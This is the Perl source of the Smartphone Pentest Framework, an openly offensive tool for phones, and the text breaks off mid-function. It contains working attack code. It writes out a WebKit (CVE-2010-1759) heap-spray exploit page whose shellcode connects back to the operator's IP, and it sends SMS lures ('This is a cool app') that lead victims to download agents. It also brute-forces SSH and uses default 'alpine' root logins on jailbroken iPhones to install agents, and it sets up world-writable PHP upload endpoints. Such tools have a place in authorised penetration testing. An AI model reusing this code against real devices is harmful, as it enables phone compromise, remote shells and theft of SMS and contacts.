Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP
tree: 53d2216fe7
Fetching contributors…

Cannot retrieve contributors at this time

executable file 1641 lines (1535 sloc) 55.534 kb
#!/usr/bin/perl
use DBI;
use Cwd;
use Expect;
use IO::Socket;
$version = "0.1.1";
$configfile = "config";
open(CONFIG, "+<$configfile");
while (<CONFIG>)
{
chomp;
s/#.*//;
s/^\s+//;
s/\s+$//;
($var, $value) = split(/\s*=\s*/, $_, 2);
$Variables{$var} = ${value};
}
$Variables{"OS"} = $^O;
print "################################################\n";
print "# #\n";
print "# Welcome to the Smartphone Pentest Framework! #\n";
print "# v" . $version . " #\n";
print "# Georgia Weidman/Bulb Security #\n";
print "# #\n";
print "################################################\n";
print "\n\n";
while (1){
print "Select An Option from the Menu:\n\n";
print "\t1.) Attach Framework to a Deployed Agent\n";
print "\t2.) Send Commands to an Agent\n";
print "\t3.) View Information Gathered\n";
print "\t4.) Attach Framework to a Mobile Modem\n";
print "\t5.) Run a remote attack\n";
print "\t6.) Run a social engineering or client side attack\n";
print "\t7.) Clear/Create Database\n";
print "\t0.) Exit\n";
print "\n\n";
print "spf>";
$choice = <>;
if ($choice == 1)
{
agent_attach();
}
if ($choice == 2)
{
agent_control();
}
if ($choice == 3)
{
view_data();
}
if ($choice == 4)
{
add_modem();
}
if ($choice == 5)
{
remote_attack();
}
if ($choice == 6)
{
social();
}
if ($choice == 7)
{
database_clear();
}
if (($choice == "exit") || ($choice == 0))
{
exit();
}
}
sub database_clear()
{
print "This will destroy all your data. Are you sure you want to? (y/N)?";
$yes = <>;
chomp($yes);
if (lc($yes) eq "y")
{
$sqlserver = $Variables{"MYSQLSERVER"};
$username = $Variables{"MYSQLUSER"};
$password = $Variables{"MYSQLPASS"};
$port = $Variables{"MYSQLPORT"};
$type = $Variables{"DATABASETYPE"};
$dropquery1 = "DROP TABLE IF EXISTS agents";
$dropquery2 = "DROP TABLE IF EXISTS data";
$dropquery3 = "DROP TABLE IF EXISTS modems";
$dropquery4 = "DROP TABLE IF EXISTS remote";
$dropquery5 = "DROP TABLE IF EXISTS client";
if ($type eq "postgres")
{
$dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver","$username","$password");
$createquery1 = "create table agents (id SERIAL NOT NULL PRIMARY KEY, number varchar(12),path varchar(1000), controlkey varchar(7), controlnumber varchar(12), platform varchar(12))";
$createquery2 = "create table data (id SERIAL NOT NULL PRIMARY KEY, sms varchar(2000),contacts varchar(1000), picture varchar(100), root varchar(5))";
$createquery3 = "create table modems (id SERIAL NOT NULL PRIMARY KEY, number varchar(12), path varchar(1000), controlkey varchar(7), type varchar(3))";
$createquery4 = "create table remote (id SERIAL NOT NULL PRIMARY KEY, ip varchar(15), exploit varchar(200), vuln varchar(3), agent varchar(3))";
$createquery5 = "create table client (id SERIAL NOT NULL PRIMARY KEY, number varchar(12), exploit varchar(200), vuln varchar(3))";
}
elsif ($type eq "mysql")
{
$createquery1 = "create table agents (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, number varchar(12),path varchar(1000), controlkey varchar(7), controlnumber varchar(12), platform varchar(12))";
$createquery2 = "create table data (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, sms varchar(2000),contacts varchar(1000), picture varchar(100), root varchar(5))";
$createquery3 = "create table modems (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, number varchar(12), path varchar(1000), controlkey varchar(7), type varchar(3))";
$createquery4 = "create table remote (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, ip varchar(15), exploit varchar(200), vuln varchar(3), agent varchar(3))";
$createquery5 = "create table client (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, number varchar(12), exploit varchar(200), vuln varchar(3))";
$dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
if (! defined $dbh)
{
print "Database doesn't exist. Creating it\n";
$makecommand = "mysqladmin -u " . $username . " create framework -p" . $password;
system($makecommand);
$dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
}
}
$sql = $dbh->prepare($dropquery1);
$sql->execute;
$sql = $dbh->prepare($dropquery2);
$sql->execute;
$sql = $dbh->prepare($dropquery3);
$sql->execute;
$sql = $dbh->prepare($dropquery4);
$sql->execute;
$sql = $dbh->prepare($dropquery5);
$sql->execute;
$sql = $dbh->prepare($createquery1);
$sql->execute;
$sql = $dbh->prepare($createquery2);
$sql->execute;
$sql = $dbh->prepare($createquery3);
$sql->execute;
$sql = $dbh->prepare($createquery4);
$sql->execute;
$sql = $dbh->prepare($createquery5);
$sql->execute;
}
}
sub social
{
$webserver = $Variables{"WEBSERVER"};
$sqlserver = $Variables{"MYSQLSERVER"};
$ipaddress = $Variables{"IPADDRESS"};
while(1)
{
print "\n\nChoose a social engineering or client side attack to launch:\n";
print "\t1.) Direct Download Agent\n";
print "\t2.) Client Side Shell\n";
print "spf>";
$choice1 = <>;
chomp($choice1);
if ($choice1 == 1)
{
direct_download();
last;
}
if ($choice1 == 2)
{
client_side();
last;
}
if (($choice1 == "exit") || ($choice1 == 0))
{
return;
}
}
}
sub client_side
{
$webserver = $Variables{"WEBSERVER"};
$sqlserver = $Variables{"MYSQLSERVER"};
$ipaddress = $Variables{"IPADDRESS"};
$shellipaddress = $Variables{"SHELLIPADDRESS"};
while(1)
{
print "Select a Client Side Attack to Run\n";
print "\t1) CVE=2010-1759 Webkit Vuln Android\n";
print "spf>";
$choice1 = <>;
if (($choice1 == "exit") || ($choice1 == 0))
{
return;
}
if ($choice1 == 1)
{
print "Hosting Path:";
$path = <>;
print "Filename:";
$filename = <>;
print "Phone Number to Attack:";
$number = <>;
chomp($number);
chomp($platform);
chomp($path);
chomp($filename);
$link = "http://" . $ipaddress . $path . $filename;
$fullpath = $webserver. $path;
$command1 = "mkdir " . $fullpath;
system($command1);
$ipaddresscopy = $shellipaddress;
@octets = split(/\./, $ipaddresscopy);
$out1 = pack "c", @octets[0];
$hex1 = unpack "H2" , $out1;
$out2 = pack "c", @octets[1];
$hex2 = unpack "H2" , $out2;
$out3 = pack "c", @octets[2];
$hex3 = unpack "H2" , $out3;
$out4 = pack "c", @octets[3];
$hex4 = unpack "H2" , $out4;
$sploitfile = $webserver . $path . $filename;
$command8 = "touch " . $sploitfile;
system($command8);
$command9 = "chmod 777 " . $sploitfile;
system($command9);
open(SPLOITFILE, ">$sploitfile");
print SPLOITFILE "<html>\n";
print SPLOITFILE "<head>\n";
print SPLOITFILE "<script>\n";
print SPLOITFILE "var ip = unescape(\"\\u" . $hex2 . $hex1 . "\\u" . $hex4 . $hex3 . "\");\n";
print SPLOITFILE "var port = unescape(\"\\u3930\");\n";
print SPLOITFILE "function trigger()\n";
print SPLOITFILE "{\n";
print SPLOITFILE "var span = document.createElement(\"div\");\n";
print SPLOITFILE "document.getElementById(\"BodyID\").appendChild(span);\n";
print SPLOITFILE "span.innerHTML = -parseFloat(\"NAN(ffffe00572c60)\");\n";
print SPLOITFILE "}\n";
print SPLOITFILE "function exploit()\n";
print SPLOITFILE "{\n";
print SPLOITFILE "var nop = unescape(\"\\u33bc\\u0057\");\n";
print SPLOITFILE "do\n";
print SPLOITFILE "{\n";
print SPLOITFILE "nop+=nop;\n";
print SPLOITFILE "} while (nop.length<=0x1000);\n";
print SPLOITFILE "var scode = nop+unescape(\"\\u1001\\ue1a0\\u0002\\ue3a0\\u1001\\ue3a0\\u2005\\ue281\\u708c\\ue3a0\\u708d\\ue287\\u0080\\uef00\\u6000\\ue1a0\\u1084\\ue28f\\u2010\\ue3a0\\u708d\\ue3a0\\u708e\\ue287\\u0080\\uef00\\u0006\\ue1a0\\u1000\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1001\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1002\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u2001\\ue28f\\uff12\\ue12f\\u4040\\u2717\\udf80\\ua005\\ua508\\u4076\\u602e\\u1b6d\\ub420\\ub401\\u4669\\u4052\\u270b\\udf80\\u2f2f\\u732f\\u7379\\u6574\\u2f6d\\u6962\\u2f6e\\u6873\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u0002\");\n";
print SPLOITFILE "scode += port;\n";
print SPLOITFILE "scode += ip;\n";
print SPLOITFILE "scode += unescape(\"\\u2000\\u2000\");\n";
print SPLOITFILE "target = new Array();\n";
print SPLOITFILE "for(i = 0; i < 0x1000; i++)\n";
print SPLOITFILE "target[i] = scode;\n";
print SPLOITFILE "for (i = 0; i <= 0x1000; i++)\n";
print SPLOITFILE "{\n";
print SPLOITFILE "document.write(target[i]+\"<i>\");\n";
print SPLOITFILE "if (i>0x999)\n";
print SPLOITFILE "{\n";
print SPLOITFILE "trigger();\n";
print SPLOITFILE "}\n";
print SPLOITFILE "}\n";
print SPLOITFILE "}\n";
print SPLOITFILE "</script>\n";
print SPLOITFILE "</head>\n";
print SPLOITFILE "<body id=\"BodyID\">\n";
print SPLOITFILE "Enjoy!\n";
print SPLOITFILE "<script>\n";
print SPLOITFILE "exploit();\n";
print SPLOITFILE "</script>\n";
print SPLOITFILE "</body>\n";
print SPLOITFILE "</html>\n";
close(SPLOITFILE);
$modem = get_modem();
if ($modem == 0)
{
print "\nNo modems found. Attach a modem to use this functionality\n";
}
else
{
$username = $Variables{"MYSQLUSER"};
$password = $Variables{"MYSQLPASS"};
$port = $Variables{"MYSQLPORT"};
$type = $Variables{"DATABASETYPE"};
if ($type eq "postgres")
{
$dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
}
elsif ($type eq "mysql")
{
$dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
}
$pathquery = "SELECT path from modems where id=" . $modem;
$sql = $dbh->prepare($pathquery);
$results = $sql->execute;
@rows = $sql->fetchrow_array();
$path2 = @rows[0];
$keyquery = "SELECT controlkey from modems where id=" . $modem;
$sql = $dbh->prepare($keyquery);
$results2 = $sql->execute;
@rows = $sql->fetchrow_array();
$key2 = @rows[0];
$control = $webserver . $path2 . "/getfunc";
open(CONTROLFILE, ">$control");
$command2 = $key2 . " " . "SEND" . " " . $number . " " . "This is a cool page: " . $link;
print CONTROLFILE $command2;
close(CONTROLFILE);
$vulnerable = "no";
$socket = new IO::Socket::INET (LocalHost => $shellipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1, Timeout=> 180);
if ($data_socket = $socket->accept())
{
$data="/system/bin/id\n";
print $data_socket $data;
$data=<$data_socket>;
print $data;
close($data_socket);
$vulnerable = "yes";
}
print "\nVulnerable: " . $vulnerable . "\n\n";
$table = "client";
$sqlserver = $Variables{"MYSQLSERVER"};
$username = $Variables{"MYSQLUSER"};
$password = $Variables{"MYSQLPASS"};
$port = $Variables{"MYSQLPORT"};
$type = $Variables{"DATABASETYPE"};
if ($type eq "postgres")
{
$dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
$number2 = "\'" . $number . "\'";
$vulnerable2 = "\'" . $vulnerable . "\'";
$webkit = "\'" . "webkit" . "\'";
}
elsif ($type eq "mysql")
{
$dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
$number2 = "\"" . $number . "\"";
$vulnerable2 = "\"" . $vulnerable . "\"";
$webkit = "\"" . "webkit" . "\"";
}
$insertquery = "INSERT INTO $table (id,number,exploit,vuln) VALUES (DEFAULT,$number2,$webkit,$vulnerable2)";
$sql = $dbh->prepare($insertquery);
$sql->execute;
last;
}
}
}
}
sub direct_download
{
$webserver = $Variables{"WEBSERVER"};
$sqlserver = $Variables{"MYSQLSERVER"};
$ipaddress = $Variables{"IPADDRESS"};
while(1)
{
print "This module sends an SMS with a link to directly download and install an Agent\n";
print "Platform(Android/iPhone/Blackberry):";
$platform = <>;
print "Hosting Path:";
$path = <>;
print "Filename:";
$filename = <>;
print "Phone Number to Attack:";
$number = <>;
chomp($number);
chomp($platform);
chomp($path);
chomp($filename);
if (lc($platform) eq "android")
{
$link = "http://" . $ipaddress . $path . $filename;
$fullpath = $webserver. $path;
$command1 = "mkdir " . $fullpath;
system($command1);
$location = $Variables{"ANDROIDAGENT"};
$command = "cp " . $location . " " . $webserver . $path . $filename;
system($command);
$modem = get_modem();
if ($modem == 0)
{
print "\nNo modems found. Attach a modem to use this functionality\n";
}
else
{
$username = $Variables{"MYSQLUSER"};
$password = $Variables{"MYSQLPASS"};
$port = $Variables{"MYSQLPORT"};
$type = $Variables{"DATABASETYPE"};
if ($type eq "postgres")
{
$dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
}
elsif ($type eq "mysql")
{
$dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
}
$pathquery = "SELECT path from modems where id=" . $modem;
$sql = $dbh->prepare($pathquery);
$results = $sql->execute;
@rows = $sql->fetchrow_array();
$path2 = @rows[0];
$keyquery = "SELECT controlkey from modems where id=" . $modem;
$sql = $dbh->prepare($keyquery);
$results2 = $sql->execute;
@rows = $sql->fetchrow_array();
$key2 = @rows[0];
$control = $webserver . $path2 . "/getfunc";
open(CONTROLFILE, ">$control");
$command2 = $key2 . " " . "SEND" . " " . $number . " " . "This is a cool app: " . $link;
print CONTROLFILE $command2;
close(CONTROLFILE);
last;
}
}
}
}
sub remote_attack
{
$webserver = $Variables{"WEBSERVER"};
$sqlserver = $Variables{"MYSQLSERVER"};
while(1)
{
print "\n\nChoose a remote attack to launch:\n";
print "\t1.) Test for Default SSH Password (iPhone)\n";
print "\t2.) Guess SSH Password (iPhone)\n";
print "spf>";
$choice1 = <>;
chomp($choice1);
if ($choice1 == 1)
{
alpine();
}
if ($choice1 == 2)
{
sshguess();
}
if (($choice1 == "exit") || ($choice1 == 0))
{
return;
}
}
}
sub sshguess
{
$webserver = $Variables{"WEBSERVER"};
$sqlserver = $Variables{"MYSQLSERVER"};
while(1)
{
print "This module attempts to guess the password for an Jailbroken iPhone on the local network by reading from a supplied password list\n";
print "IP address:";
$ipaddress = <>;
chomp($ipaddress);
print "Password file:";
$passfile = <>;
print "\n\nIP Address:" . $ipaddress . "\nPassword file:" . $passfile . "\nIs this correct?(y/N):";
$correct = <>;
chomp($correct);
if (lc($correct) eq "y")
{
guesspass($ipaddress, $passfile);
last;
}
}
}
sub guesspass
{
$ipaddress = $_[0];
$passfile = $_[1];
$vulnerable = "no";
$agent = "no";
$command = 'sftp';
$param = "root@" . $ipaddress;
$timeout = 10;
$notfound = "ssh: connect to host " . $ipaddress . " port 22: Connection refused";
$passwordstring = $parm . "'s password: ";
$location = $Variables{"IPHONEAGENT"};
$putfile = $location;
$connectstring = "Connecting to " . $ipaddress . "...";
$installcommand = "dpkg -i " . "iphone.deb" . "\n";
$guesspassword = "null";
open(READFILE, "+<$passfile");
while(<READFILE>)
{
$guess = $_;
$guess2 = $guess . "\n";
$exp = Expect->spawn($command, $param) or die "Cannot spawm sftp command";
$exp->expect($timeout,[$connectstring]);
$exp->expect($timeout,["Are you sure you want to continue connecting (yes/no)?", sub {my $self = shift; $self->send("yes\n");}]); #[$notfound, return]);
$exp->expect($timeout, $passwordstring);
$exp->send($guess2);
if ($exp->expect($timeout, ["sftp>"]))
{
$vulnerable="yes";
print "PASSWORD FOUND: " . $guess . "\n";
$guesspassword = $guess;
$exp->send("put $putfile\n");
$exp->expect($timeout, ["sftp>"]);
$exp->send("bye\n");
$command2 = "ssh";
$exp = Expect->spawn($command2, $param);
$exp->expect($timeout, $passwordstring);
$exp->send($guess2);
$exp->expect($timeout, [qr'root\s*']);
$exp->send($installcommand);
$exp->expect($timeout, "Setting up com.bulbsecurity.tooltest (0.0.1-23) ...");
$exp->send("tooltest\n");
if($exp->expect($timeout,["Smartphone Pentest Framework Agent"]))
{
$agent="yes";
}
$exp->send("exit");
$exp->soft_close();
last;
}
}
print "\nVulnerable: " . $vulnerable . "\nAgent: " . $agent;
$table = "remote";
$guessstring = "Guess: " . $guesspassword;
$sqlserver = $Variables{"MYSQLSERVER"};
$username = $Variables{"MYSQLUSER"};
$password = $Variables{"MYSQLPASS"};
$port = $Variables{"MYSQLPORT"};
$type = $Variables{"DATABASETYPE"};
if ($type eq "postgres")
{
$dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
$ip2 = "\'" . $ipaddress . "\'";
$vulnerable2 = "\'" . $vulnerable . "\'";
$agent2 = "\'" . $agent . "\'";
$exploit = "\'" . $guessstring . "\'";
}
elsif ($type eq "mysql")
{
$dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
$ip2 = "\"" . $ipaddress . "\"";
$vulnerable2 = "\"" . $vulnerable . "\"";
$agent2 = "\"" . $agent . "\"";
$exploit = "\"" . $guessstring . "\"";
}
$insertquery = "INSERT INTO $table (id,ip,exploit,vuln,agent) VALUES (DEFAULT,$ip2,$exploit,$vulnerable2,$agent2)";
$sql = $dbh->prepare($insertquery);
$sql->execute;
}
sub alpine
{
$webserver = $Variables{"WEBSERVER"};
$sqlserver = $Variables{"MYSQLSERVER"};
while(1)
{
print "This module tests for an Jailbroken iPhone with a default password on the local network\n";
print "IP address:";
$ipaddress = <>;
chomp($ipaddress);
print "\n\nIP Address:" . $ipaddress . "\nIs this correct?(y/N):";
$correct = <>;
chomp($correct);
if (lc($correct) eq "y")
{
$vulnerable = "no";
$agent = "no";
$command = 'sftp';
$param = "root@" . $ipaddress;
$timeout = 10;
$notfound = "ssh: connect to host " . $ipaddress . " port 22: Connection refused";
$passwordstring = $parm . "'s password: ";
$location = $Variables{"IPHONEAGENT"};
$putfile = $location;
$connectstring = "Connecting to " . $ipaddress . "...";
$installcommand = "dpkg -i " . "iphone.deb" . "\n";
$exp = Expect->spawn($command, $param) or die "Cannot spawm sftp command";
$exp->expect($timeout,[$connectstring]);
$exp->expect($timeout,["Are you sure you want to continue connecting (yes/no)?", sub {my $self = shift; $self->send("yes\n");}]); #[$notfound, return]);
$exp->expect($timeout, $passwordstring);
$exp->send("alpine\n");
if ($exp->expect($timeout, ["sftp>"]))
{
$vulnerable="yes";
print "Vulnerable\n";
}
$exp->send("put $putfile\n");
$exp->expect($timeout, ["sftp>"]);
$exp->send("bye\n");
$command2 = "ssh";
$exp = Expect->spawn($command2, $param);
$exp->expect($timeout, $passwordstring);
$exp->send("alpine\n");
$exp->expect($timeout, [qr'root\s*']);
#$installcommand = "dpkg -i com.bulbsecurity.tooltest_0.0.1-23_iphoneos-arm.deb\n";
$exp->send($installcommand);
$exp->expect($timeout, "Setting up com.bulbsecurity.tooltest (0.0.1-23) ...");
$exp->send("tooltest\n");
if($exp->expect($timeout,["Smartphone Pentest Framework Agent"]))
{
$agent="yes";
}
$exp->send("exit");
$exp->soft_close();
print "\nVulnerable: " . $vulnerable . "\nAgent: " . $agent;
$table = "remote";
$sqlserver = $Variables{"MYSQLSERVER"};
$username = $Variables{"MYSQLUSER"};
$password = $Variables{"MYSQLPASS"};
$port = $Variables{"MYSQLPORT"};
$type = $Variables{"DATABASETYPE"};
if ($type eq "postgres")
{
$dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
$ip2 = "\'" . $ipaddress . "\'";
$vulnerable2 = "\'" . $vulnerable . "\'";
$agent2 = "\'" . $agent . "\'";
$alpine = "\'" . "alpine" . "\'";
}
elsif ($type eq "mysql")
{
$dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
$ip2 = "\"" . $ipaddress . "\"";
$vulnerable2 = "\"" . $vulnerable . "\"";
$agent2 = "\"" . $agent . "\"";
$alpine = "\"" . "alpine" . "\"";
}
$insertquery = "INSERT INTO $table (id,ip,exploit,vuln,agent) VALUES (DEFAULT,$ip2,$alpine,$vulnerable2,$agent2)";
$sql = $dbh->prepare($insertquery);
$sql->execute;
last;
}
}
}
sub get_modem
{
$sqlserver = $Variables{"MYSQLSERVER"};
while(1)
{
$username = $Variables{"MYSQLUSER"};
$password = $Variables{"MYSQLPASS"};
$port = $Variables{"MYSQLPORT"};
$type = $Variables{"DATABASETYPE"};
if ($type eq "postgres")
{
$dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
}
elsif ($type eq "mysql")
{
$dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
}
$rowsquery = "SELECT COUNT(*) from modems";
$sql = $dbh->prepare($rowsquery);
$results = $sql->execute;
@rows = $sql->fetchrow_array();
$row = @rows[0];
if ($row eq 0)
{
return 0;
}
if ($row eq 1)
{
return 1;
}
print "\n\nAvailable Modems:\n\n";
for($i=1; $i<=$row; $i++)
{
$selectquery = "SELECT number from modems where id=" . $i;
$sql = $dbh->prepare($selectquery);
$results = $sql->execute;
@rows = $sql->fetchrow_array();
$r = @rows[0];
print "\t" . $i . ".) " . $r . "\n";
}
print "\nSelect a modem to interact with\n";
print "\nspf>";
$chosenmodem = <>;
if ($chosenmodem <= $row)
{
return $chosenmodem;
}
}
}
sub add_modem
{
$webserver = $Variables{"WEBSERVER"};
$sqlserver = $Variables{"MYSQLSERVER"};
$ipaddress = $Variables{"IPADDRESS"};
while(1)
{
print "\n\nChoose a type of modem to attach to:\n";
print "\t1.) Search for attached modem\n";
print "\t2.) Attach to a smartphone based app\n";
print "spf>";
$choice = <>;
if ($choice == 1)
{
if (-e "/dev/ttyUSB2")
{
print "USB Modem Found\n";
open(TTY, "+</dev/ttyUSB2");
last;
}
else
{
print "No USB Modem Found\n";
last;
}
}
if ($choice == 2)
{
app_connect();
last;
}
}
}
sub app_connect
{
$webserver = $Variables{"WEBSERVER"};
$sqlserver = $Variables{"MYSQLSERVER"};
$ipaddress = $Variables{"IPADDRESS"};
while(1)
{
print "\nConnect to a smartphone management app. You will need to supply the phone number,the control key, and the URL path\n\n";
print "Phone Number:";
$number = <>;
print "Control Key:";
$key = <>;
print "App URL Path:";
$path = <>;
print "\n\nPhone Number: " . $number . "Control Key: " . $key . "URL Path: " . $path . "Is this correct?(y/N):";
$correct = <>;
chomp($number);
chomp($path);
chomp($key);
chomp($correct);
if (lc($correct) eq "y")
{
$webserver = $_[0];
make_files2($path);
handshake($path,$key);
$modemtype = "app";
database_add2($number,$path,$key,$modemtype);
$startcommand = "perl poller.pl " . $path . " " . $key . " > log";
$pid = fork;
die "fork failed" unless defined $pid;
if ($pid ==0)
{
exec($startcommand);
}
last;
}
}
}
sub handshake
{
$path = $_[0];
$key = $_[1];
$webserver = $Variables{WEBSERVER};
$fullpath = $webserver. $path . "/connect";
while(1){
open(CONNECTFILE, "+<$fullpath");
$line= <CONNECTFILE>;
$correctstring = $key . " CONNECT";
if ($line eq $correctstring)
{
$command = "\n" . $key . " CONNECTED";
print CONNECTFILE $command;
close(CONNECTFILE);
print "CONNECTED!\n";
last;
}
else {
close(CONNECTFILE);
sleep(1);
}
}
}
sub database_add2
{
$table = "modems";
$sqlserver = $Variables{"MYSQLSERVER"};
$username = $Variables{"MYSQLUSER"};
$password = $Variables{"MYSQLPASS"};
$port = $Variables{"MYSQLPORT"};
$type = $Variables{"DATABASETYPE"};
if ($type eq "postgres")
{
$dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver","$username","$password");
$number2 = $_[0];
$path2 = "\'" . $_[1] . "\'";
$key2 = "\'" . $_[2] . "\'";
$type2 = "\'" . $_[3] . "\'";
}
elsif ($type eq "mysql")
{
$dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
$number2 = "\"" . $_[0] . "\"";
$path2 = "\"" . $_[1] . "\"";
$key2 = "\"" . $_[2] . "\"";
$type2 = "\"" . $_[3] . "\"";
}
$insertquery = "INSERT INTO $table (id,number,path,controlkey,type) VALUES (DEFAULT,$number2,$path2,$key2, $type2)";
$sql = $dbh->prepare($insertquery);
$sql->execute;
}
sub make_files2
{
$path = $_[0];
$webserver = $Variables{WEBSERVER};
$fullpath = $webserver. $path;
$command1 = "mkdir " . $fullpath;
system($command1);
$connectfile = $fullpath . "/connect";
$command2 = "touch " . $connectfile;
system($command2);
$command3 = "chmod 777 " . $connectfile;
system($command3);
$picturefile = $fullpath . "/picture.jpg";
$command4 = "touch " . $picturefile;
system($command4);
$command5 = "chmod 777 " . $picturefile;
system($command5);
$textfile = $fullpath . "/text.txt";
$command6 = "touch " . $textfile;
system($command6);
$command7 = "chmod 777 " . $textfile;
system($command7);
$textfile2 = $fullpath . "/text2.txt";
$command77 = "touch ". $textfile2;
system($command77);
$command7777 = "chmod 777 " . $textfile2;
system($command7777);
$pictureupload = $fullpath . "/pictureupload.php";
$command8 = "touch " . $pictureupload;
system($command8);
$command9 = "chmod 777 " . $pictureupload;
system($command9);
$pictureuploadtext = "<?php\n\$base=\$_REQUEST['picture'];\necho \$base;\n\$binary=base64_decode(\$base);\nheader('Content-Type: bitmap; charset=utf-8');\n\$file = fopen('picture.jpg', 'wb');\nfwrite(\$file, \$binary);\nfclose(\$file);\n?>";
open(PICFILE, ">$pictureupload");
print PICFILE $pictureuploadtext;
close(PICFILE);
$textupload = $fullpath . "/textuploader.php";
$command10 = "touch " . $textupload;
system($command10);
$command11 = "chmod 777 " . $textupload;
system($command11);
$textuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('text.txt', 'wb');\nfwrite(\$file, \$base);\n?>";
open(TEXTFILE, ">$textupload");
print TEXTFILE $textuploadtext;
close(TEXTFILE);
$text2upload = $fullpath . "/text2uploader.php";
$command100 = "touch " . $text2upload;
system($command100);
$command110 = "chmod 777 " . $text2upload;
system($command110);
$text2uploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('text2.txt', 'wb');\nfwrite(\$file, \$base);\n?>";
open(TEXT2FILE, ">$text2upload");
print TEXT2FILE $text2uploadtext;
close(TEXT2FILE);
$connectupload = $fullpath . "/connectuploader.php";
$command12 = "touch " . $connectupload;
system($command12);
$command13 = "chmod 777 " . $connectupload;
system($command13);
$connectuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('connect','wb');\nfwrite(\$file, \$base);\n?>";
open(CONNECTFILE, ">$connectupload");
print CONNECTFILE $connectuploadtext;
close(CONNECTFILE);
$getfuncfile = $fullpath . "/getfunc";
$command6 = "touch " . $getfuncfile;
system($command6);
$command7 = "chmod 777 " . $getfuncfile;
system($command7);
$putfuncfile = $fullpath . "/putfunc";
$command6 = "touch " . $putfuncfile;
system($command6);
$command7 = "chmod 777 " . $putfuncfile;
system($command7);
$getfuncupload = $fullpath . "/getfuncuploader.php";
$command10 = "touch " . $getfuncupload;
system($command10);
$command11 = "chmod 777 " . $getfuncupload;
system($command11);
$getfuncuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('getfunc', 'wb');\nfwrite(\$file, \$base);\n?>";
open(GETFUNCUPLOADFILE, ">$getfuncupload");
print GETFUNCUPLOADFILE $getfuncuploadtext;
close(GETFUNCUPLOADFILE);
$putfuncupload = $fullpath . "/putfuncuploader.php";
$command10 = "touch " . $putfuncupload;
system($command10);
$command11 = "chmod 777 " . $putfuncupload;
system($command11);
$putfuncuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('putfunc', 'wb');\nfwrite(\$file, \$base);\n?>";
open(PUTFUNCUPLOADFILE, ">$putfuncupload");
print PUTFUNCUPLOADFILE $putfuncuploadtext;
close(PUTFUNCUPLOADFILE);
}
sub view_data
{
$webserver = $Variables{"WEBSERVER"};
print "View Data Gathered from a Deployed Agent:\n\n";
while (1)
{
print "\n\nAvailable Agents:\n\n";
$sqlserver = $Variables{"MYSQLSERVER"};
$username = $Variables{"MYSQLUSER"};
$password = $Variables{"MYSQLPASS"};
$port = $Variables{"MYSQLPORT"};
$type = $Variables{"DATABASETYPE"};
if ($type eq "postgres")
{
$dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
}
elsif ($type eq "mysql")
{
$dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
}
$rowsquery = "SELECT COUNT(*) from agents";
$sql = $dbh->prepare($rowsquery);
$results = $sql->execute;
@rows = $sql->fetchrow_array();
$row = @rows[0];
for($i=1; $i<=$row; $i++)
{
$selectquery = "SELECT number from agents where id=" . $i;
$sql = $dbh->prepare($selectquery);
$results = $sql->execute;
@rows = $sql->fetchrow_array();
$r = @rows[0];
print "\t" . $i . ".) " . $r . "\n";
}
print "\nSelect an agent to interact with or 0 to return to the previous menu.";
print "\nspf>";
$chosenagent = <>;
if (($chosenagent == "exit") || ($chosenagent == 0))
{
return;
}
for($j=1; $j<=$row; $j++)
{
if ($chosenagent == $j)
{
get_data($j);
last;
}
}
}
}
sub get_data
{
$id = $_[0];
$sqlserver = $Variables{"MYSQLSERVER"};
$username = $Variables{"MYSQLUSER"};
$password = $Variables{"MYSQLPASS"};
$port = $Variables{"MYSQLPORT"};
$type = $Variables{"DATABASETYPE"};
if ($type eq "postgres")
{
$dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
}
elsif ($type eq "mysql")
{
$dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
}
$query1 = "SELECT sms from data where id=" . $id;
$sql = $dbh->prepare($query1);
$sms = $sql->execute;
